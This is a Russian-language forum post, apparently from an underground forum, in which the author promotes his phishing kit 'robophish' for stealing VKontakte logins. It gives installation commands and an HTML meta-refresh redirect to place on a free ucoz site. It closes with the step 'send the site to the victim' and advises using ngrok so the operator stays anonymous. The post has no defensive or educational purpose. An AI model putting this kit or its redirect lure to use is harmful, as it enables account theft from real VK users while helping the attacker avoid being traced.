What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Лучший фишинг для ВК

tabac

Midle Weight
Депозит
$0
Привет

Предистория: Где-то год назад у меня возникла потребность в хорошем фишинге для вк. Спустя некоторое время поиска, я все же нашел несколько достойных, но вспомнил о том, что я немного забыл об анонимности. Ведь фишинг надо ставить на хост, а это небольшой удар по конфиденциальности. И тогда-то я задумался, как же пользоваться фишингом, не тратить на хороший хост деньги и оставаться анонимным?

В итоге я нашел утилиту shellphish http://github.com/thelinuxchoice
но ее функционал был нацелен на не очень умных пользователей, которые до сих пор ведутся на обычный сайт с авторизацией. И тогда мне в голову пришла идея написать свою утилиту. Сборник с самыми лучшими фишингами вк. Не буду скрывать, за основу я взял его скрипт, а сайты нашел в открытом доступе. Но первая версия получилась довольно сырая и не работала должным образом. Но спустя почти год, я решил доделать начатое и выпустил вторую версию.
Скачать можно тут

на гит хабе установка не слишком понятная, так что я попробую описать все тут. Для простоты работы требуется Linux. Установка будет для Debian Linux. В других дистрибутивах, команды могут немного отличаться, однако если вы умеете гуглить вы справитесь со всеми ошибками. Установка на Windows - не тестировалась.

УСТАНОВКА:
Bash:
Скопировать в буфер обмена
1. sudo apt-get install git
2. git clone gasayminajj/robophish
3. cd robophish
4. bash robophish.sh
5. Дальше все интуитивно понятно, нажимаем по ссылке(она оч некрасивая, нужно с ней что-то делать)
6.1 Идем на сайт www.ucoz.com и создаем пустой сайт, главное выбрать более менее красивый url.
6.2 Заходим в HTML редатор.
6.3 Добавляем туда скрипт на переадресацию на наш сайт
HTML:
Скопировать в буфер обмена
<head>
<meta http-equiv="refresh" content="1;URL=ссылка" />
</head>
7. Скидываем сайт жертве.

Если у вас на этапе запуска нет ошибок, то дальше сами разберетесь. Если они есть, то это ошибки связанные с отсутствием php.
Надеюсь вы сами сами разберетесь с установкой php, если будут вопросы, дополню статью сведениями об установке. Возможно позже сделаю гайд по установке на Windows(там и самому можно разобраться, используйте Cygwin64(не реклама) )

А еще хочется узнать, не зря ли я все это сделал? Просто мне кажется, гораздо безопаснее использовать ngrok, вся информации о сайте на котором он был поднят, исчезает по нажатию ctrl+c. Если это не так, то поправьте пожайлуста)



Автор @gasayminajj
aka Егор Гасай
 
Top